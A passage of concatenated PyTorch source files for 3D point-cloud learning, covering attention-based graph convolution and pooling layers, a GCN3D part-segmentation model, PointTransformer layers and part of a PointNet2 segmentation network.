vertices: "(bs, vertice_num, 3)"):
bs, vertice_num, neighbor_num = neighbor_index.size()
neighbor_direction_norm = get_neighbor_direction_norm(vertices, neighbor_index)
support_direction_norm = F.normalize(self.directions, dim= 0) #(3, s * k)
theta = neighbor_direction_norm @ support_direction_norm
theta = self.relu(theta).contiguous().view(bs, vertice_num, neighbor_num, self.support_num, self.kernel_num)
theta = torch.max(theta, dim= 2)[0] # (bs, vertice_num, support_num, kernel_num)
theta = torch.sum(theta, dim= 2) # (bs, vertice_num, kernel_num)
attention_theta = self.multihead_attention(theta, theta, theta)
return attention_theta
class Conv_layer(nn.Module):
def __init__(self, in_channel, out_channel, support_num):
super().__init__()
# arguments:
self.in_channel = in_channel
self.out_channel = out_channel
self.support_num = support_num
# parameters:
self.relu = nn.ReLU(inplace= True)
self.weights = nn.Parameter(torch.FloatTensor(in_channel, (support_num + 1) * out_channel))
self.bias = nn.Parameter(torch.FloatTensor((support_num + 1) * out_channel))
self.directions = nn.Parameter(torch.FloatTensor(3, support_num * out_channel))
self.initialize()
def initialize(self):
stdv = 1. / math.sqrt(self.out_channel * (self.support_num + 1))
self.weights.data.uniform_(-stdv, stdv)
self.bias.data.uniform_(-stdv, stdv)
self.directions.data.uniform_(-stdv, stdv)
def forward(self,
neighbor_index: "(bs, vertice_num, neighbor_index)",
vertices: "(bs, vertice_num, 3)",
feature_map: "(bs, vertice_num, in_channel)"):
"""
Return: output feature map: (bs, vertice_num, out_channel)
"""
bs, vertice_num, neighbor_num = neighbor_index.size()
neighbor_direction_norm = get_neighbor_direction_norm(vertices, neighbor_index)
support_direction_norm = F.normalize(self.directions, dim= 0)
theta = neighbor_direction_norm @ support_direction_norm # (bs, vertice_num, neighbor_num, support_num * out_channel)
theta = self.relu(theta)
theta = theta.contiguous().view(bs, vertice_num, neighbor_num, -1)
# (bs, vertice_num, neighbor_num, support_num * out_channel)
feature_out = feature_map @ self.weights + self.bias # (bs, vertice_num, (support_num + 1) * out_channel)
feature_center = feature_out[:, :, :self.out_channel] # (bs, vertice_num, out_channel)
feature_support = feature_out[:, :, self.out_channel:] #(bs, vertice_num, support_num * out_channel)
# Fuse together - max among product
feature_support = indexing_neighbor(feature_support, neighbor_index) # (bs, vertice_num, neighbor_num, support_num * out_channel)
activation_support = theta * feature_support # (bs, vertice_num, neighbor_num, support_num * out_channel)
activation_support = activation_support.view(bs,vertice_num, neighbor_num, self.support_num, self.out_channel)
activation_support = torch.max(activation_support, dim= 2)[0] # (bs, vertice_num, support_num, out_channel)
activation_support = torch.sum(activation_support, dim= 2) # (bs, vertice_num, out_channel)
feature_fuse = feature_center + activation_support # (bs, vertice_num, out_channel)
return feature_fuse
class Attention_Conv_layer_V2(nn.Module):
def __init__(self, in_channel, out_channel, support_num):
super().__init__()
# arguments:
self.in_channel = in_channel
self.out_channel = out_channel
self.support_num = support_num
# parameters:
self.relu = nn.ReLU(inplace= True)
self.weights = nn.Parameter(torch.FloatTensor(in_channel, (support_num + 1) * out_channel))
self.bias = nn.Parameter(torch.FloatTensor((support_num + 1) * out_channel))
self.directions = nn.Parameter(torch.FloatTensor(3, support_num * out_channel))
self.multihead_attention = MultiHeadedAttention(4, out_channel, fn_attention=attention)
self.initialize()
def initialize(self):
stdv = 1. / math.sqrt(self.out_channel * (self.support_num + 1))
self.weights.data.uniform_(-stdv, stdv)
self.bias.data.uniform_(-stdv, stdv)
self.directions.data.uniform_(-stdv, stdv)
def forward(self,
neighbor_index: "(bs, vertice_num, neighbor_index)",
vertices: "(bs, vertice_num, 3)",
feature_map: "(bs, vertice_num, in_channel)"):
"""
Return: output feature map: (bs, vertice_num, out_channel)
"""
bs, vertice_num, neighbor_num = neighbor_index.size()
neighbor_direction_norm = get_neighbor_direction_norm(vertices, neighbor_index)
support_direction_norm = F.normalize(self.directions, dim= 0)
theta = neighbor_direction_norm @ support_direction_norm # (bs, vertice_num, neighbor_num, support_num * out_channel)
theta = self.relu(theta)
theta = theta.contiguous().view(bs, vertice_num, neighbor_num, -1)
# (bs, vertice_num, neighbor_num, support_num * out_channel)
feature_out = feature_map @ self.weights + self.bias # (bs, vertice_num, (support_num + 1) * out_channel)
feature_center = feature_out[:, :, :self.out_channel] # (bs, vertice_num, out_channel)
feature_support = feature_out[:, :, self.out_channel:] #(bs, vertice_num, support_num * out_channel)
# Fuse together - max among product
feature_support = indexing_neighbor(feature_support, neighbor_index) # (bs, vertice_num, neighbor_num, support_num * out_channel)
activation_support = theta * feature_support # (bs, vertice_num, neighbor_num, support_num * out_channel)
activation_support = activation_support.view(bs,vertice_num, neighbor_num, self.support_num, self.out_channel)
activation_support = torch.max(activation_support, dim= 2)[0] # (bs, vertice_num, support_num, out_channel)
activation_support = torch.sum(activation_support, dim= 2) # (bs, vertice_num, out_channel)
feature_fuse = feature_center + activation_support # (bs, vertice_num, out_channel)
feature_fuse = self.multihead_attention(feature_fuse, feature_fuse, feature_fuse)
return feature_fuse
class Attention_Conv_layer(nn.Module):
def __init__(self, in_channel, out_channel, support_num):
super().__init__()
# arguments:
self.in_channel = in_channel
self.out_channel = out_channel
self.support_num = support_num
# parameters:
self.relu = nn.ReLU(inplace= True)
self.query_weights = nn.Parameter(torch.FloatTensor(in_channel, (support_num + 1) * out_channel))
self.query_bias = nn.Parameter(torch.FloatTensor((support_num + 1) * out_channel))
self.query_directions = nn.Parameter(torch.FloatTensor(3, support_num * out_channel))
self.key_weights = nn.Parameter(torch.FloatTensor(in_channel, (support_num + 1) * out_channel))
self.key_bias = nn.Parameter(torch.FloatTensor((support_num + 1) * out_channel))
self.key_directions = nn.Parameter(torch.FloatTensor(3, support_num * out_channel))
self.value_weights = nn.Parameter(torch.FloatTensor(in_channel, (support_num + 1) * out_channel))
self.value_bias = nn.Parameter(torch.FloatTensor((support_num + 1) * out_channel))
self.value_directions = nn.Parameter(torch.FloatTensor(3, support_num * out_channel))
self.multihead_attention = MultiHeadedAttention(4, out_channel, fn_attention=attention)
self.initialize()
def initialize(self):
stdv = 1. / math.sqrt(self.out_channel * (self.support_num + 1))
self.query_weights.data.uniform_(-stdv, stdv)
self.query_bias.data.uniform_(-stdv, stdv)
self.query_directions.data.uniform_(-stdv, stdv)
self.key_weights.data.uniform_(-stdv, stdv)
self.key_bias.data.uniform_(-stdv, stdv)
self.key_directions.data.uniform_(-stdv, stdv)
self.value_weights.data.uniform_(-stdv, stdv)
self.value_bias.data.uniform_(-stdv, stdv)
self.value_directions.data.uniform_(-stdv, stdv)
def forward(self,
neighbor_index: "(bs, vertice_num, neighbor_index)",
vertices: "(bs, vertice_num, 3)",
feature_map: "(bs, vertice_num, in_channel)"):
bs, vertice_num, neighbor_num = neighbor_index.size()
neighbor_direction_norm = get_neighbor_direction_norm(vertices, neighbor_index)
# query
support_query_direction_norm = F.normalize(self.query_directions, dim= 0)
query_theta = neighbor_direction_norm @ support_query_direction_norm # (bs, vertice_num, neighbor_num, support_num * out_channel)
query_theta = self.relu(query_theta)
query_theta = query_theta.contiguous().view(bs, vertice_num, neighbor_num, -1)
# (bs, vertice_num, neighbor_num, support_num * out_channel)
query_feature_out = feature_map @ self.query_weights + self.query_bias # (bs, vertice_num, (support_num + 1) * out_channel)
query_feature_center = query_feature_out[:, :, :self.out_channel] # (bs, vertice_num, out_channel)
query_feature_support = query_feature_out[:, :, self.out_channel:] #(bs, vertice_num, support_num * out_channel)
# Fuse together - max among product
query_feature_support = indexing_neighbor(query_feature_support, neighbor_index) # (bs, vertice_num, neighbor_num, support_num * out_channel)
query_activation_support = query_theta * query_feature_support # (bs, vertice_num, neighbor_num, support_num * out_channel)
query_activation_support = query_activation_support.view(bs,vertice_num, neighbor_num, self.support_num, self.out_channel)
query_activation_support = torch.max(query_activation_support, dim= 2)[0] # (bs, vertice_num, support_num, out_channel)
query_activation_support = torch.sum(query_activation_support, dim= 2) # (bs, vertice_num, out_channel)
query_feature_fuse = query_feature_center + query_activation_support # (bs, vertice_num, out_channel)
# key
support_key_direction_norm = F.normalize(self.key_directions, dim= 0)
key_theta = neighbor_direction_norm @ support_key_direction_norm # (bs, vertice_num, neighbor_num, support_num * out_channel)
key_theta = self.relu(key_theta)
key_theta = key_theta.contiguous().view(bs, vertice_num, neighbor_num, -1)
# (bs, vertice_num, neighbor_num, support_num * out_channel)
key_feature_out = feature_map @ self.key_weights + self.key_bias # (bs, vertice_num, (support_num + 1) * out_channel)
key_feature_center = key_feature_out[:, :, :self.out_channel] # (bs, vertice_num, out_channel)
key_feature_support = key_feature_out[:, :, self.out_channel:] #(bs, vertice_num, support_num * out_channel)
# Fuse together - max among product
key_feature_support = indexing_neighbor(key_feature_support, neighbor_index) # (bs, vertice_num, neighbor_num, support_num * out_channel)
key_activation_support = key_theta * key_feature_support # (bs, vertice_num, neighbor_num, support_num * out_channel)
key_activation_support = key_activation_support.view(bs,vertice_num, neighbor_num, self.support_num, self.out_channel)
key_activation_support = torch.max(key_activation_support, dim= 2)[0] # (bs, vertice_num, support_num, out_channel)
key_activation_support = torch.sum(key_activation_support, dim= 2) # (bs, vertice_num, out_channel)
key_feature_fuse = key_feature_center + key_activation_support # (bs, vertice_num, out_channel)
# value
support_value_direction_norm = F.normalize(self.value_directions, dim= 0)
value_theta = neighbor_direction_norm @ support_value_direction_norm # (bs, vertice_num, neighbor_num, support_num * out_channel)
value_theta = self.relu(value_theta)
value_theta = value_theta.contiguous().view(bs, vertice_num, neighbor_num, -1)
# (bs, vertice_num, neighbor_num, support_num * out_channel)
value_feature_out = feature_map @ self.value_weights + self.value_bias # (bs, vertice_num, (support_num + 1) * out_channel)
value_feature_center = value_feature_out[:, :, :self.out_channel] # (bs, vertice_num, out_channel)
value_feature_support = value_feature_out[:, :, self.out_channel:] #(bs, vertice_num, support_num * out_channel)
# Fuse together - max among product
value_feature_support = indexing_neighbor(value_feature_support, neighbor_index) # (bs, vertice_num, neighbor_num, support_num * out_channel)
value_activation_support = value_theta * value_feature_support # (bs, vertice_num, neighbor_num, support_num * out_channel)
value_activation_support = value_activation_support.view(bs,vertice_num, neighbor_num, self.support_num, self.out_channel)
value_activation_support = torch.max(value_activation_support, dim= 2)[0] # (bs, vertice_num, support_num, out_channel)
value_activation_support = torch.sum(value_activation_support, dim= 2) # (bs, vertice_num, out_channel)
value_feature_fuse = value_feature_center + value_activation_support # (bs, vertice_num, out_channel)
attention_feature = self.multihead_attention(query_feature_fuse, key_feature_fuse, value_feature_fuse)
return attention_feature
class Pool_layer(nn.Module):
def __init__(self, pooling_rate: int= 4, neighbor_num: int= 4):
super().__init__()
self.pooling_rate = pooling_rate
self.neighbor_num = neighbor_num
def forward(self,
vertices: "(bs, vertice_num, 3)",
feature_map: "(bs, vertice_num, channel_num)"):
"""
Return:
vertices_pool: (bs, pool_vertice_num, 3),
feature_map_pool: (bs, pool_vertice_num, channel_num)
"""
bs, vertice_num, _ = vertices.size()
neighbor_index = get_neighbor_index(vertices, self.neighbor_num)
neighbor_feature = indexing_neighbor(feature_map, neighbor_index) #(bs, vertice_num, neighbor_num, channel_num)
pooled_feature = torch.max(neighbor_feature, dim= 2)[0] #(bs, vertice_num, channel_num)
pool_num = int(vertice_num / self.pooling_rate)
sample_idx = torch.randperm(vertice_num)[:pool_num]
vertices_pool = vertices[:, sample_idx, :] # (bs, pool_num, 3)
feature_map_pool = pooled_feature[:, sample_idx, :] #(bs, pool_num, channel_num)
return vertices_pool, feature_map_pool
def test():
import time
bs = 8
v = 1024
dim = 3
n = 20
vertices = torch.randn(bs, v, dim)
neighbor_index = get_neighbor_index(vertices, n)
s = 3
# conv_1 = Conv_surface(kernel_num= 32, support_num= s)
conv_1 = Attention_Conv_surface2(kernel_num=32, support_num=s)
# conv_2 = Conv_layer(in_channel= 32, out_channel= 64, support_num= s)
conv_2 = Attention_Conv_layer(in_channel= 32, out_channel= 64, support_num= s)
pool = Pool_layer(pooling_rate= 4, neighbor_num= 4)
print("Input size: {}".format(vertices.size()))
start = time.time()
f1 = conv_1(neighbor_index, vertices)
print("\n[1] Time: {}".format(time.time() - start))
print("[1] Out shape: {}".format(f1.size()))
start = time.time()
f2 = conv_2(neighbor_index, vertices, f1)
print("\n[2] Time: {}".format(time.time() - start))
print("[2] Out shape: {}".format(f2.size()))
start = time.time()
v_pool, f_pool = pool(vertices, f2)
print("\n[3] Time: {}".format(time.time() - start))
print("[3] v shape: {}, f shape: {}".format(v_pool.size(), f_pool.size()))
if __name__ == "__main__":
test()
```
#### File: part_seg/model/model_gcn3d_bn_layeratt.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
import sys
sys.path.append("../")
import gcn3d
class GCN3D(nn.Module):
def __init__(self, class_num, support_num, neighbor_num):
super().__init__()
self.neighbor_num = neighbor_num
self.num_part = class_num
self.conv_0 = gcn3d.Conv_surface_attention(kernel_num= 128, support_num= support_num)
self.conv_1 = gcn3d.Conv_layer_attention(128, 128, support_num= support_num)
self.pool_1 = gcn3d.Pool_layer(pooling_rate= 4, neighbor_num= 4)
self.conv_2 = gcn3d.Conv_layer_attention(128, 256, support_num= support_num)
self.conv_3 = gcn3d.Conv_layer_attention(256, 256, support_num= support_num)
self.pool_2 = gcn3d.Pool_layer(pooling_rate= 4, neighbor_num= 4)
self.conv_4 = gcn3d.Conv_layer_attention(256, 512, support_num= support_num)
dim_fuse = sum([128, 128, 256, 256, 512, 512, 16])
self.conv1d_block = nn.Sequential(
nn.Conv1d(dim_fuse, 512, 1),
nn.ReLU(inplace= True),
nn.Conv1d(512, 512, 1),
nn.ReLU(inplace= True),
nn.Conv1d(512, class_num, 1),
)
self.bn0 = nn.BatchNorm1d(128, momentum=0.1)
self.bn1 = nn.BatchNorm1d(128, momentum=0.1)
self.bn2 = nn.BatchNorm1d(256, momentum=0.1)
self.bn3 = nn.BatchNorm1d(256, momentum=0.1)
def forward(self,
vertices: "tensor (bs, vetice_num, 3)",
onehot: "tensor (bs, cat_num)",
gt=None):
"""
Return: (bs, vertice_num, class_num)
"""
vertices = torch.transpose(vertices, 1, 2)
bs, vertice_num, _ = vertices.size()
#neighbor_index = gcn3d.get_neighbor_index(vertices, self.neighbor_num)
neighbor_index, neighbor_value = gcn3d.get_neighbor_index_value(vertices, self.neighbor_num)
fm_0 = F.relu(self.bn0(self.conv_0(neighbor_index, vertices, neighbor_value).transpose(2, 1)).transpose(2, 1), inplace= True)
fm_1 = F.relu(self.bn1(self.conv_1(neighbor_index, vertices, fm_0, neighbor_value).transpose(2, 1)).transpose(2, 1), inplace= True)
v_pool_1, fm_pool_1 = self.pool_1(vertices, fm_1)
neighbor_index, neighbor_value = gcn3d.get_neighbor_index_value(v_pool_1, self.neighbor_num)
fm_2 = F.relu(self.bn2(self.conv_2(neighbor_index, v_pool_1, fm_pool_1, neighbor_value).transpose(2, 1)).transpose(2, 1), inplace= True)
fm_3 = F.relu(self.bn3(self.conv_3(neighbor_index, v_pool_1, fm_2, neighbor_value).transpose(2, 1)).transpose(2, 1), inplace= True)
#print("add bn")
v_pool_2, fm_pool_2 = self.pool_2(v_pool_1, fm_3)
neighbor_index, neighbor_value = gcn3d.get_neighbor_index_value(v_pool_2, self.neighbor_num)
fm_4 = self.conv_4(neighbor_index, v_pool_2, fm_pool_2, neighbor_value)
f_global = fm_4.max(1)[0] #(bs, f)
nearest_pool_1 = gcn3d.get_nearest_index(vertices, v_pool_1)
nearest_pool_2 = gcn3d.get_nearest_index(vertices, v_pool_2)
fm_2 = gcn3d.indexing_neighbor(fm_2, nearest_pool_1).squeeze(2)
fm_3 = gcn3d.indexing_neighbor(fm_3, nearest_pool_1).squeeze(2)
fm_4 = gcn3d.indexing_neighbor(fm_4, nearest_pool_2).squeeze(2)
f_global = f_global.unsqueeze(1).repeat(1, vertice_num, 1)
onehot = onehot.unsqueeze(1).repeat(1, vertice_num, 1) #(bs, vertice_num, cat_one_hot)
fm_fuse = torch.cat([fm_0, fm_1, fm_2, fm_3, fm_4, f_global, onehot], dim= 2)
conv1d_input = fm_fuse.permute(0, 2, 1) #(bs, fuse_ch, vertice_num)
conv1d_out = self.conv1d_block(conv1d_input)
conv1d_out = F.log_softmax(conv1d_out, dim=1)
pred = conv1d_out.permute(0, 2, 1) #(bs, vertice_num, ch)
if gt is not None:
return pred, F.nll_loss(pred.contiguous().view(-1, self.num_part), gt.view(-1, 1)[:, 0])
else:
return pred
def test():
from dataset_shapenet import test_model
dataset = "../../shapenetcore_partanno_segmentation_benchmark_v0"
model = GCN3D(class_num= 50, support_num= 1, neighbor_num= 50)
test_model(model, dataset, cuda= "0", bs= 2, point_num= 2048)
if __name__ == "__main__":
test()
```
#### File: PAConv/part_seg/modules.py
```python
from copy import deepcopy
import torch
import torch.nn as nn
import torch.nn.functional as F
from lib.pointops.functions import pointops
EPSILON = 1e-8
class PointTransformerLayer_old(nn.Module):
def __init__(self,
in_channels,
out_channels=None,
num_neighbors=16):
super(PointTransformerLayer, self).__init__()
self.out_channels = in_channels if out_channels is None else out_channels
self.to_query = nn.Conv1d(in_channels, self.out_channels, kernel_size=1)
self.to_key = nn.Conv1d(in_channels, self.out_channels, kernel_size=1)
self.to_value = nn.Conv1d(in_channels, self.out_channels, kernel_size=1)
self.to_pos_enc = nn.Sequential(
nn.Conv2d(3, 3, kernel_size=1, bias=False),
nn.BatchNorm2d(3),
nn.ReLU(inplace=True),
nn.Conv2d(3, self.out_channels, kernel_size=1)
)
self.to_attn = nn.Sequential(
nn.BatchNorm2d(self.out_channels),
nn.ReLU(inplace=True),
nn.Conv2d(self.out_channels, self.out_channels, kernel_size=1, bias=False),
nn.BatchNorm2d(self.out_channels),
nn.ReLU(inplace=True),
nn.Conv2d(self.out_channels, self.out_channels, kernel_size=1)
)
self.key_grouper = pointops.QueryAndGroup(nsample=num_neighbors, return_idx=True)
self.value_grouper = pointops.QueryAndGroup(nsample=num_neighbors, use_xyz=False)
self.softmax = nn.Softmax(dim=-1) # (B, C_out, N, K)
def forward(self, px):
# points, p: (B, N, 3)
# in_features, x: (B, C_in, N)
p, x = px
# query, key, and value
q = self.to_query(x) # (B, C_out, N)
k = self.to_key(x) # (B, C_out, N)
v = self.to_value(x) # (B, C_out, N)
# neighbor search
n_k, _, n_idx = self.key_grouper(xyz=p, features=k) # (B, 3+C_out, N, K)
n_v, _ = self.value_grouper(xyz=p, features=v, idx=n_idx.int()) # (B, C_out, N, K)
# relative positional encoding
n_r = self.to_pos_enc(n_k[:, 0:3, :, :]) # (B, C_out, N, K)
n_v = n_v
energy = q.unsqueeze(-1) - n_k[:, 3:, :, :] + n_r
# self-attention
a = self.to_attn(energy) # (B, C_out, N, K)
a = self.softmax(a)
y = torch.sum(n_v * a, dim=-1, keepdim=False)
return [p, y]
class PointTransformerLayer_L(nn.Module):
def __init__(self,
in_channels,
out_channels=None,
num_neighbors=16):
super(PointTransformerLayer_L, self).__init__()
self.out_channels = in_channels if out_channels is None else out_channels
self.chunk = nn.TransformerEncoderLayer(d_model=in_channels, dim_feedforward=2 * in_channels, dropout=0.0, nhead=4)
self.pe = nn.Sequential(
nn.Conv2d(3, 3, kernel_size=1, bias=False),
nn.BatchNorm2d(3),
nn.ReLU(inplace=True),
nn.Conv2d(3, self.out_channels, kernel_size=1)
)
self.fc = nn.Conv1d(in_channels, self.out_channels, 1)
self.grouper = pointops.QueryAndGroup(nsample=num_neighbors, use_xyz=False)
self.softmax = nn.Softmax(dim=-1) # (B, C_out, N, K)
def forward(self, px):
# points, p: (B, N, 3)
# in_features, x: (B, C_in, N)
p, x = px
group_features, grouped_xyz = self.grouper(xyz=p, features=x)
#print("new.shape:",group_features.shape, grouped_xyz.shape)
position_encoding = self.pe(grouped_xyz)
input_features = group_features + position_encoding
#print("input_features.shape", input_features.shape)
B, D, np, ns = input_features.shape
input_features = input_features.permute(0, 2, 1, 3).reshape(-1, D, ns).permute(2, 0, 1)
#print("input_features_new.shape", input_features.shape)
transformed_feats = self.chunk(input_features).permute(1, 2, 0).reshape(B, np, D, ns).transpose(1, 2)
#print("transformed_feats.shape", transformed_feats.shape)
output_features = F.max_pool2d(transformed_feats, kernel_size=[1, ns]).squeeze(-1) # (B, C, npoint)
#print("output_features.shape", output_features.shape)
output_features = self.fc(output_features).squeeze(-1)
#print("output_features.shape", output_features.shape)
return [p, output_features]
class PointTransformerLayer_G(nn.Module):
def __init__(self,
in_channels,
out_channels=None,
num_neighbors=16):
super(PointTransformerLayer_G, self).__init__()
self.out_channels = in_channels if out_channels is None else out_channels
self.chunk = nn.TransformerEncoderLayer(d_model=in_channels, dim_feedforward=2 * in_channels, dropout=0.0, nhead=4)
self.pe = nn.Sequential(
nn.Conv1d(3, 3, kernel_size=1, bias=False),
nn.BatchNorm1d(3),
nn.ReLU(inplace=True),
nn.Conv1d(3, self.out_channels, kernel_size=1)
)
self.fc = nn.Conv1d(in_channels, self.out_channels, 1)
self.grouper = pointops.QueryAndGroup(nsample=num_neighbors, use_xyz=False)
self.softmax = nn.Softmax(dim=-1) # (B, C_out, N, K)
def forward(self, px):
p, x = px
xyz_flipped = p.transpose(1, 2)
position_encoding = self.pe(xyz_flipped)
input_features = x + position_encoding
input_features = input_features.permute(2, 0, 1)
transformed_feats = self.chunk(input_features).permute(1, 2, 0)
output_features = self.fc(transformed_feats).squeeze(-1)
return [p, output_features]
class PointTransformerBlock(nn.Module):
def __init__(self,
in_channels,
out_channels=None,
num_neighbors=16):
super(PointTransformerBlock, self).__init__()
self.out_channels = in_channels if out_channels is None else out_channels
self.linear1 = nn.Conv1d(in_channels, self.out_channels, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm1d(self.out_channels)
self.transformer_l = PointTransformerLayer_L(self.out_channels, num_neighbors=num_neighbors)
self.bn_l = nn.BatchNorm1d(self.out_channels)
self.transformer_g = PointTransformerLayer_G(self.out_channels, num_neighbors=num_neighbors)
self.bn_g = nn.BatchNorm1d(self.out_channels)
self.linear2 = nn.Conv1d(self.out_channels, self.out_channels, kernel_size=1, bias=False)
self.bn2 = nn.BatchNorm1d(self.out_channels)
self.relu = nn.ReLU(inplace=True)
def forward(self, px):
p, x = px
y = self.relu(self.bn1(self.linear1(x)))
y = self.relu(self.bn_l(self.transformer_l([p, y])[1]))
y = self.relu(self.bn_g(self.transformer_g([p, y])[1]))
y = self.bn2(self.linear2(y))
y += x
y = self.relu(y)
return [p, y]
class TransitionDown(nn.Module):
def __init__(self,
in_channels,
out_channels=None,
stride=4,
num_neighbors=16):
assert stride > 1
super(TransitionDown, self).__init__()
self.out_channels = in_channels if out_channels is None else out_channels
self.stride = stride
self.grouper = pointops.QueryAndGroup(nsample=num_neighbors, use_xyz=True)
self.mlp = nn.Sequential(
nn.Conv2d(3 + in_channels, self.out_channels, kernel_size=1, bias=False),
nn.BatchNorm2d(self.out_channels),
nn.ReLU(inplace=True),
nn.Conv2d(self.out_channels, self.out_channels, kernel_size=1, bias=False),
nn.BatchNorm2d(self.out_channels),
nn.ReLU(inplace=True)
)
self.max_pool = nn.MaxPool2d((1, num_neighbors))
def forward(self, p1x):
# points, p: (B, N, 3)
# in_features, x: (B, C_in, N)
p1, x = p1x
# furthest point sampling and neighbor search
M = x.shape[-1] // self.stride
p1_trans = p1.transpose(1, 2).contiguous() # (B, 3, N)
p2 = pointops.gathering(p1_trans, pointops.furthestsampling(p1, M)).transpose(1, 2).contiguous()
n_x, _ = self.grouper(xyz=p1, new_xyz=p2, features=x) # (B, 3 + C_in, M, K)
# mlp and local max pooling
n_y = self.mlp(n_x) # (B, C_out, M, K)
y = self.max_pool(n_y).squeeze(-1) # (B, C_out, M)
return [p2, y]
class TransitionUp(nn.Module):
def __init__(self, in_channels, out_channels=None, skip_channels=None):
super(TransitionUp, self).__init__()
self.out_channels = in_channels if out_channels is None else out_channels
self.skip_channels = in_channels if skip_channels is None else skip_channels
self.linear1 = nn.Sequential(
nn.Conv1d(in_channels, self.out_channels, kernel_size=1, bias=False),
nn.BatchNorm1d(self.out_channels),
nn.ReLU(inplace=True)
)
self.linear2 = nn.Sequential(
nn.Conv1d(self.skip_channels, self.out_channels, kernel_size=1, bias=False),
nn.BatchNorm1d(self.out_channels),
nn.ReLU(inplace=True)
)
def forward(self, p1x1, p2x2):
# in_points, p1: (B, N, 3)
# in_features, x1: (B, C_in, N)
# skip_points, p2: (B, M, 3)
# skip_features, x2: (B, C_skip, M)
p1, x1 = p1x1
p2, x2 = p2x2
# Three nearest neighbor upsampling
dist, idx = pointops.nearestneighbor(p2, p1)
dist_recip = 1.0 / (dist + EPSILON)
norm = torch.sum(dist_recip, dim=2, keepdim=True)
weight = dist_recip / norm
up_x1 = pointops.interpolation(self.linear1(x1), idx, weight)
# aggregation
y = self.linear2(x2) + up_x1 # (B, C_out, M)
return [p2, y]
# Just for debugging
class SimplePointTransformerSeg(nn.Module):
def __init__(self, in_channels, num_classes, num_neighbors):
super(SimplePointTransformerSeg, self).__init__()
hidden_channels = in_channels * 4
# encoder
self.in_mlp = nn.Sequential(
nn.Conv1d(in_channels, hidden_channels, kernel_size=1, bias=False),
nn.BatchNorm1d(hidden_channels),
nn.ReLU(inplace=True),
nn.Conv1d(hidden_channels, hidden_channels, kernel_size=1, bias=False),
nn.BatchNorm1d(hidden_channels),
nn.ReLU(inplace=True)
)
self.block1 = PointTransformerBlock(hidden_channels, num_neighbors=num_neighbors)
self.down = TransitionDown(hidden_channels, num_neighbors=num_neighbors)
self.block2 = PointTransformerBlock(hidden_channels, num_neighbors=num_neighbors)
# decoder
self.up = TransitionUp(hidden_channels)
self.block3 = PointTransformerBlock(hidden_channels, num_neighbors=num_neighbors)
self.out_mlp = nn.Sequential(
nn.Conv1d(hidden_channels, hidden_channels, kernel_size=1, bias=False),
nn.BatchNorm1d(hidden_channels),
nn.ReLU(inplace=True),
nn.Conv1d(hidden_channels, num_classes, kernel_size=1)
)
def _break_up_pc(self, pc):
xyz = pc[..., 0:3].contiguous()
features = pc[..., 3:].transpose(1, 2).contiguous() if pc.size(-1) > 3 else deepcopy(xyz)
return xyz, features
def forward(self, pc):
# stride == 1
p1, x1 = self._break_up_pc(pc)
x1 = self.in_mlp(x1)
p1x1 = self.block1([p1, x1])
# stride == 4
p4x4 = self.down(p1x1)
p4x4 = self.block2(p4x4)
# stride == 1
p1y = self.up(p4x4, p1x1)
p1y = self.block3(p1y)
y = self.out_mlp(p1y[1])
return y
if __name__ == "__main__":
from time import time
assert torch.cuda.is_available()
B, C_in, C_out, N, K = 4, 6, 20, 1024, 16
model = SimplePointTransformerSeg(C_in, C_out, K).cuda()
pc = torch.randn(B, N, 3 + C_in).cuda()
s = time()
y = model(pc)
d = time() - s
print("Elapsed time (sec):", d)
print(y.shape)
```
#### File: lib/paconv_lib/functional.py
```python
from . import functions
def assign_score_withk(score, feat, center_feat, grouped_idx, aggregate='sum'):
return functions.assign_score_withk(score, feat, center_feat, grouped_idx, aggregate)
```
#### File: model/pointnet2/pointnet2_paconv_seg.py
```python
from collections import namedtuple
import torch
import torch.nn as nn
from model.pointnet2.pointnet2_paconv_modules import PointNet2FPModule
from util import block
class PointNet2SSGSeg(nn.Module):
r"""
PointNet2 with single-scale grouping
Semantic segmentation network that uses feature propogation layers
Parameters
----------
k: int
Number of semantics classes to predict over -- size of softmax classifier that run for each point
c: int = 6
Number of input channels in the feature descriptor for each point. If the point cloud is Nx9, this
value should be 6 as in an Nx9 point cloud, 3 of the channels are xyz, and 6 are feature descriptors
use_xyz: bool = True
Whether or not to use the xyz position of a point as a feature
"""
def __init__(self, c=3, k=13, use_xyz=True, args=None):
super().__init__()
self.nsamples = args.get('nsamples', [32, 32, 32, 32])
self.npoints = args.get('npoints', [None, None, None, None])
self.sa_mlps = args.get('sa_mlps', [[c, 32, 32, 64], [64, 64, 64, 128], [128, 128, 128, 256], [256, 256, 256, 512]])
self.fp_mlps = args.get('fp_mlps', [[128 + c, 128, 128, 128], [256 + 64, 256, 128], [256 + 128, 256, 256], [512 + 256, 256, 256]])
self.paconv = args.get('pointnet2_paconv', [True, True, True, True, False, False, False, False])
self.fc = args.get('fc', 128)
if args.get('cuda', False):
from model.pointnet2.pointnet2_paconv_modules import PointNet2SAModuleCUDA as PointNet2SAModule
else:
from model.pointnet2.pointnet2_paconv_modules import PointNet2SAModule
self.SA_modules = nn.ModuleList()
self.SA_modules.append(PointNet2SAModule(npoint=self.npoints[0], nsample=self.nsamples[0], mlp=self.sa_mlps[0], use_xyz=use_xyz,
use_paconv=self.paconv[0], args=args))
self.SA_modules.append(PointNet2SAModule(npoint=self.npoints[1], nsample=self.nsamples[1], mlp=self.sa_mlps[1], use_xyz=use_xyz,
use_paconv=self.paconv[1], args=args))
self.SA_modules.append(PointNet2SAModule(npoint=self.npoints[2], nsample=self.nsamples[2], mlp=self.sa_mlps[2], use_xyz=use_xyz,
use_paconv=self.paconv[2], args=args))
self.SA_modules.append(PointNet2SAModule(npoint=self.npoints[3], nsample=self.nsamples[3], mlp=self.sa_mlps[3], use_xyz=use_xyz,
use_paconv=self.paconv[3], args=args))
self.FP_modules = nn.ModuleList()
self.FP_modules.append(PointNet2FPModule(mlp=self.fp_mlps[0], use_paconv=self.paconv[4], args=args))
self.FP_modules.append(PointNet2FPModule(mlp=self.fp_mlps[1], use_paconv=self.paconv[5], args=args))
self.FP_modules.append(PointNet2FPModule(mlp=self.fp_mlps[2], use_paconv=self.paconv[6], args=args))
self.FP_modules.append(PointNet2FPModule(mlp=self.fp_mlps[3], use_paconv=self.paconv[7], args=args))
self.FC_layer = nn.Sequential(block.Conv2d(self.fc, self.fc, bn=True), nn.Dropout(), block.Conv2d(self.fc, k, activation=None))
def _break_up_pc(self, pc):
xyz = pc[..., 0:3].contiguous()
